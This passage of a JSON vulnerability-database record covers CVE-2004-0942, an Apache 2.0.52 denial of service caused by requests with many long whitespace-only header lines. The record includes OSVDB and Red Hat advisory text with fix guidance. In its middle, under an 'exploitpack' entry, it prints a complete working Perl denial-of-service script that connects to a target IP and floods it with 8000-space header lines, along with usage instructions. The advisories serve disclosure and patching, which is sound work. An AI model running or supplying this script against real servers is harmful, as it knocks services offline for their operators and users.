remote denial of service. The issue is triggered when an attacker sends specially crafted requests with a large amount of overly long headers comprised only of spaces, and will result in loss of availability for the server.\n## Solution Description\nUpgrade to version 2.0.53-dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nApache contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker sends specially crafted requests with a large amount of overly long headers comprised only of spaces, and will result in loss of availability for the server.\n## References:\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg21190212)\n[Vendor Specific Advisory URL](http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01106)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=302163)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102198-1)\nSecurity Tracker: 1012083\n[Secunia Advisory ID:13045](https://secuniaresearch.flexerasoftware.com/advisories/13045/)\n[Secunia Advisory ID:13196](https://secuniaresearch.flexerasoftware.com/advisories/13196/)\n[Secunia Advisory ID:13194](https://secuniaresearch.flexerasoftware.com/advisories/13194/)\n[Secunia Advisory ID:13228](https://secuniaresearch.flexerasoftware.com/advisories/13228/)\n[Secunia Advisory ID:16449](https://secuniaresearch.flexerasoftware.com/advisories/16449/)\n[Secunia Advisory ID:13158](https://secuniaresearch.flexerasoftware.com/advisories/13158/)\n[Secunia Advisory ID:19072](https://secuniaresearch.flexerasoftware.com/advisories/19072/)\n[Secunia Advisory ID:13243](https://secuniaresearch.flexerasoftware.com/advisories/13243/)\n[Secunia Advisory ID:13303](https://secuniaresearch.flexerasoftware.com/advisories/13303/)\nRedHat RHSA: RHSA-2004:562\nOther Advisory URL: http://www.suse.de/de/security/2004_01_sr.html\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:135\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200411-18.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-10/1195.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-10/1206.html\nISS X-Force ID: 17930\nGeneric Informational URL: http://news.com.com/Apple+unloads+dozens+of+fixes+for+OS+X/2100-1002_3-5834873.html\n[CVE-2004-0942](https://vulners.com/cve/CVE-2004-0942)\nBugtraq ID: 11436\n", "modified": "2004-11-01T11:47:39", "published": "2004-11-01T11:47:39", "id": "OSVDB:11391", "href": "https://vulners.com/osvdb/OSVDB:11391", "title": "Apache HTTP Server Header Parsing Space Saturation DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache 2.0.52 - GET Denial of Service", "edition": 1, "published": "2005-03-04T00:00:00", "title": "Apache 2.0.52 - GET Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0942"], "modified": "2005-03-04T00:00:00", "id": "EXPLOITPACK:E9EA96C2B20207865E30D83F6DC37198", "href": "", "sourceData": "#!/usr/bin/perl\n\n# Based on -> \n# apache-squ1rt.c exploit.\n#\n# Original credit goes to Chintan Trivedi on the\n# FullDisclosure mailing list:\n# http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html\n#\n# More info ->\n# \n# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942\n# Added ->\n# Added future with we can exploit Apache web servers on windows system. For it you should experiment\n# with [trys] parameter of this code.\n# \n# By default parameter trys = 8000, for DoS Apache web servers on windows system try to \n# increase this parameter.\n#\n# For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this\n#\n# C:\\perl ap2.0.52_dos.pl 127.0.0.1 30000\n#\n# <+> Prepare to start connect.\n# <+> Connected to 127.0.0.1\n# <+> Send of first part of devil header.\n# <+> Prepare to DoS with 10000 trys.\n# <+> Start DoS second part of devil header.\n# <SOD> |====================> <EOD>\n# <+> Ok now target web server maybe DoSeD.\n#\n#\n# Note -> \n# \n# If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.\n# And if you see \"Eror 500\" you are lucky man :)\n#\n# Warnings -> \n# This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or\n# use it for attack, or others things. \n#\n# Shit -> \n# My English now is bulls shit :( I try study it :)\n# \n\n# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)\n\n# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.\n\n# Contact to me at greenwood3[AT]yandex[dot]ru\n\nuse IO::Socket;\n\nif (@ARGV <1)\n {\n print \"\\n ::: ---------------------------------------------- :::\\n\";\n print \" ::: Another yet DoS exploit for Apache <= 2.0.52 :::\\n\";\n print \" ::: Usage: ap2.0.52_dos.pl <ip> [trys] :::\\n\";\n print \" ::: Coded by GreenwooD from Network Security Team :::\\n\";\n print \" ::: ---------------------------------------------- :::\\n\";\n exit();\n }\n\nprint \"\\n <+> Prepare to start connect.\\n\";\n\n$s = IO::Socket::INET->new(Proto=>\"tcp\",\n PeerAddr=>$ARGV[0],\n PeerPort=>80,\n Timeout=>6\n ) or die \" <-> Target web server already DoSeD ??? or can't connect :(\\n\";\n $s->autoflush();\n\nprint \" <+> Connected to $ARGV[0]\\n\";\nprint \" <+> Send of first part of devil header.\\n\"; \n \n print $s \"GET / HTTP/1.0\\n\";\n\n$trys = 8000; # Default\n\nif ($ARGV[1])\n{\n $trys = $ARGV[1];\n}\n\nprint \" <+> Prepare to DoS with $trys trys.\\n\";\nprint \" <+> Start DoS send second part of devil header.\\n\"; \nprint \" <SOD> |\";\n\n$i=0;\n\n do {\n\n print $s (\" \" x 8000 . \"\\n\"); \n\n \n if ($i % 500 == 0)\n { \n print \"=\";\n } \n\n ++$i;\n\n } until ($i == $trys); \n\n\nprint \"> <EOD>\\n\";\n\nclose($s);\n\nprint \" <+> Ok now target web server maybe DoSeD.\\n\"; \n\n# milw0rm.com [2005-03-04]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-12-11T13:32:38", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0885", "CVE-2004-0942", "CVE-2004-1834"], "description": "The Apache HTTP server is a powerful, full-featured, efficient, and\nfreely-available Web server.\n\nAn issue has been discovered in the mod_ssl module when configured to use\nthe \"SSLCipherSuite\" directive in directory or location context. If a\nparticular location context has been configured to require a specific set\nof cipher suites, then a client will be able to access that location using\nany cipher suite allowed by the virtual host configuration. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-0885 to this issue.\n\nAn issue has been discovered in the handling of white space in request\nheader lines using MIME folding. A malicious client could send a carefully\ncrafted request, forcing the server to consume large amounts of memory,\nleading to a denial of service. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2004-0942 to this issue.\n\nSeveral minor bugs were also discovered, including:\n\n- In the mod_cgi module, problems that arise when CGI scripts are \n invoked from SSI pages by mod_include using the \"#include virtual\" \n syntax have been fixed.\n\n- In the mod_dav_fs module, problems with the handling of indirect locks\n on the S/390x platform have been fixed.\n\nUsers of the Apache HTTP server who are affected by these issues should\nupgrade to these updated packages, which contain backported patches.", "modified": "2017-07-29T20:29:23", "published": "2004-11-12T05:00:00", "id": "RHSA-2004:562", "href": "https://access.redhat.com/errata/RHSA-2004:562", "type": "redhat", "title": "(RHSA-2004:562) httpd security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
